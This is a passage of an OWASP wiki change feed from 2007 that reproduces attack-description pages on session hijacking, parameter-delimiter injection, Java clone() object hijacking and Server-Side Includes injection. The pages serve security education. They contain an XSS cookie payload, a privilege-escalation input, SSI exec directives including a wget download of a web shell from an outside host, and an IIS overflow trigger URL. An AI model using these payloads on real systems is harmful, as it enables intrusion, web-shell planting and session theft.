* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;diff=22962&amp;amp;oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;action=history history])&lt;br /&gt;
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;diff=22963&amp;amp;oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;diff=22965&amp;amp;oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;diff=22936&amp;amp;oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;diff=22937&amp;amp;oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):&lt;br /&gt;
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&amp;amp;action=history history])&lt;br /&gt;
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&amp;amp;action=history history])&lt;br /&gt;
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&amp;amp;action=history history])&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Session_hijacking_attack&amp;diff=23086</id>
		<title>Session hijacking attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Session_hijacking_attack&amp;diff=23086"/>
				<updated>2007-11-05T17:22:00Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
The session hijack attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. &lt;br /&gt;
&lt;br /&gt;
Because a http communication use many different TCP connection, the web server need a method to recognize every user’s connections. The most useful method in use, depends on a token that the Web Server send to the client browser after a successful client authentication. A session token is normally composed by a string of variable width and it could be used indifferent ways, like: in the URL, in the header of the http requisition as a cookie or in the other parts of the header of the http request or yet in the body of the http requisition.&lt;br /&gt;
&lt;br /&gt;
The Session Hijacking attack compromise the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.&lt;br /&gt;
&lt;br /&gt;
The session token could be compromised in different ways, the most common are:&lt;br /&gt;
&lt;br /&gt;
• Predictable session token;&lt;br /&gt;
&lt;br /&gt;
• Session Sniffing;&lt;br /&gt;
&lt;br /&gt;
• Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);&lt;br /&gt;
&lt;br /&gt;
• Man-in-the-middle attacks.&lt;br /&gt;
&lt;br /&gt;
• Man-in-the-browser attacks&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Very High&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
====Session Sniffing====&lt;br /&gt;
&lt;br /&gt;
In the example as we can see, first the attacker uses a sniffer to capture a valid token session called “Session ID”, then he uses the valid token session to gain unauthorized access to the Web Server. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Session_Hijacking_3.JPG]] &lt;br /&gt;
&lt;br /&gt;
Figure 2. Manipulating the token session executing the session hijacking attack.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
====Cross-site script attack====&lt;br /&gt;
&lt;br /&gt;
The attacker can compromise the session token by using malicious code or programs running at the client-side, the example will show how the attacker could use a XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim click on the link, the JavaScript will run and complete the instructions made by the attacker.&lt;br /&gt;
The example in figure 3 uses an XSS attack to shows the cookie value of the current session, using the same technique is possible to create a specific Javascript code that will send the cookie to the attacker: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;alert(document.cookie);&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Code_Injection.JPG]] &lt;br /&gt;
&lt;br /&gt;
Figure 3. Code injection.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Other Examples'''&lt;br /&gt;
The following attacks acts intercepting the information exchange between the client and the server&lt;br /&gt;
&lt;br /&gt;
Man-in-the-middle&lt;br /&gt;
*[[Man-in-the-middle attack]]&lt;br /&gt;
&lt;br /&gt;
Man-in-the-browser&lt;br /&gt;
*[[Man-in-the-browser attack]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== External References==&lt;br /&gt;
*http://www.iss.net/security_center/advice/Exploits/TCP/session_hijacking/default.htm&lt;br /&gt;
* http://en.wikipedia.org/wiki/HTTP_cookie&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Authorization]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
* [[Man-in-the-middle attack]]&lt;br /&gt;
* [[Session Prediction]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
[[:Category:Session Management]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Session Management]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Session_hijacking_attack&amp;diff=23085</id>
		<title>Session hijacking attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Session_hijacking_attack&amp;diff=23085"/>
				<updated>2007-11-05T17:21:35Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
The session hijack attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. &lt;br /&gt;
&lt;br /&gt;
Because a http communication use many different TCP connection, the web server need a method to recognize every user’s connections. The most useful method in use, depends on a token that the Web Server send to the client browser after a successful client authentication. A session token is normally composed by a string of variable width and it could be used indifferent ways, like: in the URL, in the header of the http requisition as a cookie or in the other parts of the header of the http request or yet in the body of the http requisition.&lt;br /&gt;
&lt;br /&gt;
The Session Hijacking attack compromise the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.&lt;br /&gt;
&lt;br /&gt;
The session token could be compromised in different ways, the most common are:&lt;br /&gt;
&lt;br /&gt;
• Predictable session token;&lt;br /&gt;
&lt;br /&gt;
• Session Sniffing;&lt;br /&gt;
&lt;br /&gt;
• Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);&lt;br /&gt;
&lt;br /&gt;
• Man-in-the-middle attacks.&lt;br /&gt;
&lt;br /&gt;
•Man-in-the-browser attacks&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Very High&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
====Session Sniffing====&lt;br /&gt;
&lt;br /&gt;
In the example as we can see, first the attacker uses a sniffer to capture a valid token session called “Session ID”, then he uses the valid token session to gain unauthorized access to the Web Server. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Session_Hijacking_3.JPG]] &lt;br /&gt;
&lt;br /&gt;
Figure 2. Manipulating the token session executing the session hijacking attack.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
====Cross-site script attack====&lt;br /&gt;
&lt;br /&gt;
The attacker can compromise the session token by using malicious code or programs running at the client-side, the example will show how the attacker could use a XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim click on the link, the JavaScript will run and complete the instructions made by the attacker.&lt;br /&gt;
The example in figure 3 uses an XSS attack to shows the cookie value of the current session, using the same technique is possible to create a specific Javascript code that will send the cookie to the attacker: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;alert(document.cookie);&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Code_Injection.JPG]] &lt;br /&gt;
&lt;br /&gt;
Figure 3. Code injection.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Other Examples'''&lt;br /&gt;
The following attacks acts intercepting the information exchange between the client and the server&lt;br /&gt;
&lt;br /&gt;
Man-in-the-middle&lt;br /&gt;
*[[Man-in-the-middle attack]]&lt;br /&gt;
&lt;br /&gt;
Man-in-the-browser&lt;br /&gt;
*[[Man-in-the-browser attack]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== External References==&lt;br /&gt;
*http://www.iss.net/security_center/advice/Exploits/TCP/session_hijacking/default.htm&lt;br /&gt;
* http://en.wikipedia.org/wiki/HTTP_cookie&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Authorization]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
* [[Man-in-the-middle attack]]&lt;br /&gt;
* [[Session Prediction]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
[[:Category:Session Management]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Session Management]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Parameter_Delimiter&amp;diff=23084</id>
		<title>Parameter Delimiter</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Parameter_Delimiter&amp;diff=23084"/>
				<updated>2007-11-05T17:20:08Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
This attack is based on manipulation of parameters delimiter used by web application input vectors, in order to cause unexpected behaviors like access control and authorization bypass, information disclosure, among others.&lt;br /&gt;
&lt;br /&gt;
==Severity==&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation==&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
In order to illustrate this vulnerability, it’ll be used a vulnerability found on Poster V2, a posting system based on PHP programming language. &lt;br /&gt;
&lt;br /&gt;
This application has a dangerous vulnerability that allows inserting data into user fields (username, password, email address and privileges) in “mem.php” file, which is responsible for managing application user.&lt;br /&gt;
&lt;br /&gt;
An example of the file “mem.php”, where user Jose has admin privileges and Alice user access:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;?&lt;br /&gt;
 Jose|12345678|jose@attack.com|admin|&lt;br /&gt;
 Alice|87654321|alice@attack.com|normal|&lt;br /&gt;
 ?&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When a user wants to edit his profile, he must use edit account” option in the “index.php” page and enter his login information. However, using “|” as a parameter delimiter on email field followed by “admin”, the user could elevate his privileges to administrator. Example:&lt;br /&gt;
&lt;br /&gt;
 Username: Alice&lt;br /&gt;
 Password: 87654321&lt;br /&gt;
 Email: alice@attack.com |admin| &lt;br /&gt;
&lt;br /&gt;
This information will be recorded in “mem.php” file like this: &lt;br /&gt;
&lt;br /&gt;
 Alice|87654321|alice@attack.com|admin|normal|&lt;br /&gt;
&lt;br /&gt;
In this case, the last parameter delimiter considered is “|admin|” and the user could elevate his privileges by assigning administrator profile.&lt;br /&gt;
&lt;br /&gt;
Although this vulnerability doesn’t allow manipulation of others user profiles, it allows privilege escalation for application users.&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
*http://cwe.mitre.org/data/definitions/141.html&lt;br /&gt;
*http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0307&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
[[:Category: Authorization]]&lt;br /&gt;
[[:Category: Command Execution]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
[[:Category:Injection Attack]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category: Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
[[:Category: Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Injection]]&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Session_hijacking_attack&amp;diff=23083</id>
		<title>Session hijacking attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Session_hijacking_attack&amp;diff=23083"/>
				<updated>2007-11-05T17:19:16Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
The session hijack attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. &lt;br /&gt;
&lt;br /&gt;
Because a http communication use many different TCP connection, the web server need a method to recognize every user’s connections. The most useful method in use, depends on a token that the Web Server send to the client browser after a successful client authentication. A session token is normally composed by a string of variable width and it could be used indifferent ways, like: in the URL, in the header of the http requisition as a cookie or in the other parts of the header of the http request or yet in the body of the http requisition.&lt;br /&gt;
&lt;br /&gt;
The Session Hijacking attack compromise the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.&lt;br /&gt;
&lt;br /&gt;
The session token could be compromised in different ways, the most common are:&lt;br /&gt;
•	Predictable session token&lt;br /&gt;
•	Session Sniffing&lt;br /&gt;
•	Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc)&lt;br /&gt;
•	Man-in-the-middle attacks&lt;br /&gt;
•	Man-in-the-browser attacks&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Very High&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
====Session Sniffing====&lt;br /&gt;
&lt;br /&gt;
In the example as we can see, first the attacker uses a sniffer to capture a valid token session called “Session ID”, then he uses the valid token session to gain unauthorized access to the Web Server. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Session_Hijacking_3.JPG]] &lt;br /&gt;
&lt;br /&gt;
Figure 2. Manipulating the token session executing the session hijacking attack.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
====Cross-site script attack====&lt;br /&gt;
&lt;br /&gt;
The attacker can compromise the session token by using malicious code or programs running at the client-side, the example will show how the attacker could use a XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim click on the link, the JavaScript will run and complete the instructions made by the attacker.&lt;br /&gt;
The example in figure 3 uses an XSS attack to shows the cookie value of the current session, using the same technique is possible to create a specific Javascript code that will send the cookie to the attacker: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;alert(document.cookie);&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:Code_Injection.JPG]] &lt;br /&gt;
&lt;br /&gt;
Figure 3. Code injection.&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Other Examples'''&lt;br /&gt;
The following attacks acts intercepting the information exchange between the client and the server&lt;br /&gt;
&lt;br /&gt;
Man-in-the-middle&lt;br /&gt;
*[[Man-in-the-middle attack]]&lt;br /&gt;
&lt;br /&gt;
Man-in-the-browser&lt;br /&gt;
*[[Man-in-the-browser attack]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== External References==&lt;br /&gt;
*http://www.iss.net/security_center/advice/Exploits/TCP/session_hijacking/default.htm&lt;br /&gt;
* http://en.wikipedia.org/wiki/HTTP_cookie&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category: Authorization]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
* [[Man-in-the-middle attack]]&lt;br /&gt;
* [[Session Prediction]]&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
[[:Category:Session Management]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Session Management]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Mobile_code:_object_hijack&amp;diff=23082</id>
		<title>Mobile code: object hijack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Mobile_code:_object_hijack&amp;diff=23082"/>
				<updated>2007-11-05T17:16:54Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
This attack consists in a technique to create objects without constructors’ methods by taking advantage of clone() method of Java based applications.&lt;br /&gt;
&lt;br /&gt;
Case a certain class implements cloneable() method declared as public, but doesn’t has a public constructor method nor declared as final, it is possible to extent it into a new class and create objects using the clone() method.&lt;br /&gt;
&lt;br /&gt;
The clonable() method certificates that the clone() method functions correctly. A cloned object has the same attributes (variables values) that the original object, but the objects are independents.&lt;br /&gt;
&lt;br /&gt;
==Severity==&lt;br /&gt;
Medium to High&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation==&lt;br /&gt;
Medium&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
In this example, a public class “BankAccount” implements the clonable() method which declares “Object clone(string accountnumber)”:&lt;br /&gt;
&lt;br /&gt;
 public class BankAccount implements Cloneable{&lt;br /&gt;
 public Object clone(String accountnumber) throws                                                                                                  &lt;br /&gt;
 CloneNotSupportedException&lt;br /&gt;
      {&lt;br /&gt;
       Object returnMe = new BankAccount(account number);&lt;br /&gt;
       …&lt;br /&gt;
      }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
An attacker can implement a malicious public class that extends the parent BankAccount class, as follows: &lt;br /&gt;
&lt;br /&gt;
 public class MaliciousBankAccount extends BankAccount implements   &lt;br /&gt;
                                                       Cloneable{&lt;br /&gt;
 public Object clone(String accountnumber) throws CloneNotSupportedException &lt;br /&gt;
               {&lt;br /&gt;
                Object returnMe = super.clone();&lt;br /&gt;
                …&lt;br /&gt;
               }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
A Java applet from certain application is acquired and subverted by an attacker. Then, he makes the victim accepts and runs a Trojan or malicious code that was prepared to manipulate objects’ state and behavior. This code is instantiated and executed continuously using default JVM on victim’s machine. When the victim invokes the Java applet from the original application using the same JVM, then the attacker clones the class, he manipulates the attributes values and after that substitutes the original object for the malicious one.&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://cwe.mitre.org/data/definitions/491.html - Mobile Code: Object Hijack&lt;br /&gt;
http://www.fortifysoftware.com/vulncat/ - Object Model Violation: Erroneous clone() Method&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
[[:Category: Logical Attacks]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
*[[Mobile code: invoking untrusted mobile code]]&lt;br /&gt;
*[[Mobile code: non-final public field]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
[[:Category: Unsafe Mobile Code]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
[[:Category: Session Management]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Abuse of Functionality]]&lt;br /&gt;
[[Category:Attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&amp;diff=23081</id>
		<title>Server-Side Includes (SSI) Injection</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&amp;diff=23081"/>
				<updated>2007-11-05T17:15:05Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
SSIs are directives present on Web applications used to feed a HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some action before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. &lt;br /&gt;
&lt;br /&gt;
The Server-Side Include attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited thru manipulation of SSI in use on the application or forcing its use thru user input fields. &lt;br /&gt;
&lt;br /&gt;
It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt; ! # = / . &amp;quot; - &amp;gt; and [a-zA-Z0-9] &lt;br /&gt;
&lt;br /&gt;
Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.&lt;br /&gt;
&lt;br /&gt;
In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under permission of web server process owner.&lt;br /&gt;
&lt;br /&gt;
The attack possibilities that the intruder can gain access sensitive information, as password files and execute shell commands. The SSIs directives are inject in input fields and they are sent to the web server. The web server parses and executes the directives, before supplying the page. Then, the attack result will be viewable the next time that the page will be loaded for user browser.&lt;br /&gt;
&lt;br /&gt;
== Severity ==&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
== Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
Medium to High&lt;br /&gt;
&lt;br /&gt;
== Examples ==&lt;br /&gt;
&lt;br /&gt;
=== Example 1===&lt;br /&gt;
&lt;br /&gt;
The commands used to inject SSI vary according to the server operational system in use.  The following commands represent the syntax that should be used to execute OS commands. &lt;br /&gt;
&lt;br /&gt;
'''Linux:'''&lt;br /&gt;
&lt;br /&gt;
List files of directory:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt; !--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Access directories:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;!--#exec cmd=&amp;quot;cd /root/dir/&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Execution script:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt; !--#exec cmd=&amp;quot;wget http://mysite.com/shell.txt | rename shell.txt shell.php&amp;quot; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Windows:'''&lt;br /&gt;
&lt;br /&gt;
List files of directory:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt; !--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Access directories:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt; !--#exec cmd=&amp;quot;cd C:\admin\dir&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
&lt;br /&gt;
Other SSI examples that can be used to access and set server information:&lt;br /&gt;
&lt;br /&gt;
To change the error message output:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#config errmsg=&amp;quot;File not found, informs users and password&amp;quot;--&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To show current document filename:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#echo var=&amp;quot;DOCUMENT_NAME&amp;quot; --&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To show virtual path and filename:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#echo var=&amp;quot;DOCUMENT_URI&amp;quot; --&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#config timefmt=&amp;quot;A %B %d %Y %r&amp;quot;--&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Using the “fsize” command, it is possible to print the size of selected file:&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#fsize file=&amp;quot;ssi.shtml&amp;quot; --&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 3===&lt;br /&gt;
&lt;br /&gt;
An old vulnerability in the IIS versions 4.0 and 5.0 allows that an attacker obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes. &lt;br /&gt;
[http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0506 CVE 2001-0506].&lt;br /&gt;
&lt;br /&gt;
By creating a malicious page containing the SSI code bellow and forcing the application to load this page ([[Path Traversal]] attack), it’s possible to perform this attack: &lt;br /&gt;
&lt;br /&gt;
ssi_over.shtml&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;!--#include file=”UUUUUUUU...UU”--&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
PS: The number of “U” needs to be longer than 2049.&lt;br /&gt;
 &lt;br /&gt;
Forcing application to load the ssi_over.shtml page:&lt;br /&gt;
&lt;br /&gt;
Non-malicious URL:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;www.vulnerablesite.org/index.asp?page=news.asp&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Malicious URL:&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.&lt;br /&gt;
&lt;br /&gt;
==External References==&lt;br /&gt;
&lt;br /&gt;
http://www.students.mines.edu/examples/  - CGI and SSI Examples&lt;br /&gt;
&lt;br /&gt;
http://www.comptechdoc.org/independent/web/cgi/ssimanual/ssiexamples.html - SSI Examples&lt;br /&gt;
&lt;br /&gt;
==Related Threats==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Command Execution]]&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
*[[Code Injection]] &lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
&lt;br /&gt;
[[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
